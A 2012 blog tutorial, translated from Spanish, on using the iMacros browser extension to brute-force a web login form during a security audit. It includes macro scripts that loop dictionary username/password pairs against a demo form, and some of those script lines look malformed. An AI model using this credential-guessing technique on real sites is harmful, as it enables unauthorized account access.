Thursday, February 16, 2012

1. Brute-foce password testing with iMacros!


"In order to achieve what is possible, you have to try the impossible over and over again" - Hermann Hesse



Hello!

In this post, my first with content, I'm going to present an alternative to usual brute-force tools used to get credentials in a portal.

The story begins one day, in wich I was auditing a website with a vulnerable form to brute-force attacks (because it didn't implement waiting times between requests), and I wanted to provide an evidence because, as you know, is not the same to say "fire burns" that  "put your hand here and you will see what warm it is", the second option is more shocking.

So I tried to use one of the most popular tools for this purpose, Medusa / Hydra, and I was going crazy trying to write the order that fits with that form, but no way. The problem was that the identifiers of the form fields were dynamically generated with JavaScript and  it have the nice habit of  change, so I could not reference it (if anyone knows how, please explain it to me).

Discarding the use of common tools I thought to use iMacros, presented as an extension for Firefox (and also part of the excellent suite FireCat or Mantra), which lets you automate tasks in the browser with a lot of versatility. 

I know iMacros a few years ago due to a friend, Mr Adrian Capdevila. He used it to automate repetitive tasks and, later, some restless minds export this idea to play with advantage in some web games.

The fact is that this extension allows you to record a task and then repeat it over and over again and this, in essence, is like a brute force attack, just had to see if I could handle variable data, as the title "try the impossible over and over again" and that may "achieve what is possible".

So, as you can imagine having written the article, finally I could get it and I'm going to explain how:

  • We entered our target form (you can see a very simple example I created for the occasion, as it does not look very ethical to show a real case that could be easily reused) and we load the extension.





  • Then, in the "Rec" tab the click mode should be X/Y, since the value of the HTML tag was changing and it is not useful.



  • Then we click on "Record" button and take necessary steps for a connection attempt, which are:
    • Click in user text area, "Usuario"
    • Write user name (anything)
    • Click in password text area, "Contraseña"
    • Write password (anything)
    • Click Login button, "Autenticar"
    • Click in "Stop"
    • Save generated file with "Save"

NOTE: It is very important to perform these actions with mouse clicks and not by pressing Tab or Enter keys, because we want to register the positions where we clicked.



  • The file looks like:
VERSION BUILD=7400919 RECORDER=FX
TAB T=1
URL GOTO=http://10.0.0.5/index.html
CLICK X=324 Y=113
TAG POS=1 TYPE=INPUT:TEXT FORM=ACTION:/cgi-bin/validate.pl ATTR=NAME:user CONTENT=usuario
CLICK X=324 Y=113 CONTENT=usuario
CLICK X=324 Y=140
SET !ENCRYPTION NO
CONTENT=contrasenya
CLICK X=192 Y=164


  • That can be simplified to:
VERSION BUILD=7400919 RECORDER=FX
TAB T=1
URL GOTO=http://10.0.0.5/index.html
CLICK X=324 Y=113 CONTENT=usuario
SET !ENCRYPTION NO
CLICK X=324 Y=140 CONTENT={{!COL2}}
CLICK X=192 Y=164


  • We can test its performance on the "Play" tab and, if it goes well, then we have a base that can be modified to work in iterative mode.

  • Now it is necessary to add a file as a data source with users and passwords. In this case I used a file in CSV format because iMacros handles it very well and with a little Perl script I previously completed a few lines in the format "user", "password".
' File with users and passwords for testing. This is a CSV with 2 columns
SET !DATASOURCE /home/users/jluispellicer/dictionary.csv
SET !DATASOURCE_COLUMNS 2
 

  • The following must be define iteration on this file with LOOP! command.
 ' We start recursion with the initial value 1
SET !LOOP 1
SET !DATASOURCE_LINE {{!LOOP}}

  • And, finally, substitute values ​​with variables that contain the file data.
 ' Fill name
CLICK X=324 Y=113 CONTENT={{!COL1}}

' Fill password
CLICK X=324 Y=140 CONTENT={{!COL2}}

  • This is the final code with comments, that works on my form.
VERSION BUILD=7400919 RECORDER=FX

' Close all tab but the current
TAB CLOSEALLOTHERS
TAB T=1

File with users and passwords for testing. This is a CSV with 2 columns 
SET !DATASOURCE /home/users/jluispellicer/dictionary.csv
SET !DATASOURCE_COLUMNS 2

We start recursion with the initial value 1 
SET !LOOP 1
SET !DATASOURCE_LINE {{!LOOP}}

' Close page
'URL GOTO=http://10.0.0.5/index.html

' Fill name
CLICK X=324 Y=113 CONTENT={{!COL1}}

' Fill password
SET !ENCRYPTION NO
CLICK X=324 Y=140 CONTENT={{!COL2}}

' Click en Login button, Autenticar
CLICK X=192 Y=164



  • Once fully prepared, we launch "Repeat Macro Max" with a high value and clicking on "Play (Loop)" as shown in the following video, with the final success with the password:


As you will see it isn't a very efficient method, as it waits for the page to be fully loaded, and I have not set any stop condition, but iMacros offers many more possibilities, from the web interface you can write to file, use JavaScript code, etc., and furthermore it can be used in different programming languages.

Well, I hope you liked it, if there is any doubt you can ask in the comments and if you want some script or file used you can request it to me without problem. I have not wanted to deep into too much detail, for example, the API extension, not to focus on them, but rather in the possibility of using iMacros for this purpose.


Greetings!


NOTE: This is a non-automatic translation of the original blog written in spanish. I hope you are comprehending and tell me if you find errors. Thanks a lot!

1 comment:

Please leave your comment related to the topic, I only ask you to say it respectfully :)